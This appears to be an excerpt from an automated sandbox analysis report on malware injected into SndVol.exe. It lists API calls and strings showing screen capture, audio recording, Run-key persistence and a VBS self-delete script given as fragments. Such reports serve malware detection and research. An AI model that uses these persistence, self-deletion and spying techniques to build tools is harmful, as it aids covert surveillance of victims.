                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                • String ID: Control Panel\Desktop
                                                                • API String ID: 4127273184-27424756
                                                                • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                                                • Instruction ID: 6200e2f2e31a093297a9a4ad217e1585101b292a5397be1825131ea25e0af650
                                                                • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                                                • Instruction Fuzzy Hash: BE11D322F8021033D91934394D9BF7E2906A383F21F95815FF6123A6CAF8DB1A5003DB
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor
                                                                • String ID:
                                                                • API String ID: 2325560087-0
                                                                • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                                • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                                • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                • Instruction Fuzzy Hash:
                                                                APIs
                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                                  • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                                • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                                • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                                • DeleteObject.GDI32(00000000), ref: 00418F30
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                                • DeleteDC.GDI32(00000000), ref: 00418F62
                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                                • GetCursorInfo.USER32(?), ref: 00418FA7
                                                                • GetIconInfo.USER32(?,?), ref: 00418FBD
                                                                • DeleteObject.GDI32(?), ref: 00418FEC
                                                                • DeleteObject.GDI32(?), ref: 00418FF9
                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                                • DeleteDC.GDI32(?), ref: 0041917C
                                                                • DeleteDC.GDI32(00000000), ref: 0041917F
                                                                • DeleteObject.GDI32(00000000), ref: 00419182
                                                                • GlobalFree.KERNEL32(?), ref: 0041918D
                                                                • DeleteObject.GDI32(00000000), ref: 00419241
                                                                • GlobalFree.KERNEL32(?), ref: 00419248
                                                                • DeleteDC.GDI32(?), ref: 00419258
                                                                • DeleteDC.GDI32(00000000), ref: 00419263
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                • String ID: DISPLAY
                                                                • API String ID: 4256916514-865373369
                                                                • Opcode ID: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                                • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                                • Opcode Fuzzy Hash: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                                • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                                APIs
                                                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                                • ExitProcess.KERNEL32 ref: 0040D7D0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: """, 0$")$0qF$0qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                • API String ID: 1861856835-466687293
                                                                • Opcode ID: f7d322809b914f19b846363ddb38753919320f4f9bcc977e84cbdb017e4fa96d
                                                                • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                                • Opcode Fuzzy Hash: f7d322809b914f19b846363ddb38753919320f4f9bcc977e84cbdb017e4fa96d
                                                                • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                                APIs
                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                                • SetEvent.KERNEL32 ref: 0041B219
                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                                • CloseHandle.KERNEL32 ref: 0041B23A
                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                • API String ID: 738084811-2094122233
                                                                • Opcode ID: 50832f8bf9a84463f1ce31ba7bee2e24b45050ddeed62568717ea9fad8fd07d9
                                                                • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                                • Opcode Fuzzy Hash: 50832f8bf9a84463f1ce31ba7bee2e24b45050ddeed62568717ea9fad8fd07d9
                                                                • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                                APIs
                                                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                                • ExitProcess.KERNEL32 ref: 0040D419
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                • API String ID: 3797177996-1898615514
                                                                • Opcode ID: 7dc79a9c7b7f57b190baedc40edbf326f9f94c0a8f415f8b325b2df22b0f194d
                                                                • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                                • Opcode Fuzzy Hash: 7dc79a9c7b7f57b190baedc40edbf326f9f94c0a8f415f8b325b2df22b0f194d
                                                                • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                                • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                                • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                                • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                                • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                                • Sleep.KERNEL32(000001F4), ref: 00412682
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                                • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                                • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                • String ID: .exe$WDH$exepath$open$temp_
                                                                • API String ID: 2649220323-3088914985
                                                                • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                                • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                                • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                                • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Write$Create
                                                                • String ID: RIFF$WAVE$data$fmt
                                                                • API String ID: 1602526932-4212202414
                                                                • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                                • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\SndVol.exe,00000001,0040764D,C:\Windows\SysWOW64\SndVol.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: C:\Windows\SysWOW64\SndVol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                • API String ID: 1646373207-2877372328
                                                                • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                                • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040CE07
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                                • CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                                                • _wcslen.LIBCMT ref: 0040CEE6
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                                • CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000), ref: 0040CF84
                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                                • _wcslen.LIBCMT ref: 0040CFC6
                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                                • ExitProcess.KERNEL32 ref: 0040D062
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                • String ID: 6$C:\Windows\SysWOW64\SndVol.exe$del$open
                                                                • API String ID: 1579085052-1404393845
                                                                • Opcode ID: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
                                                                • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                                • Opcode Fuzzy Hash: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
                                                                • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                                APIs
                                                                • lstrlenW.KERNEL32(?), ref: 0041C036
                                                                • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                                • lstrlenW.KERNEL32(?), ref: 0041C067
                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                                • _wcslen.LIBCMT ref: 0041C13B
                                                                • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                                                • GetLastError.KERNEL32 ref: 0041C173
                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                                • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                                • GetLastError.KERNEL32 ref: 0041C1D0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                • String ID: ?
                                                                • API String ID: 3941738427-1684325040
                                                                • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                                • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                • String ID:
                                                                • API String ID: 3899193279-0
                                                                • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                                • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                                APIs
                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
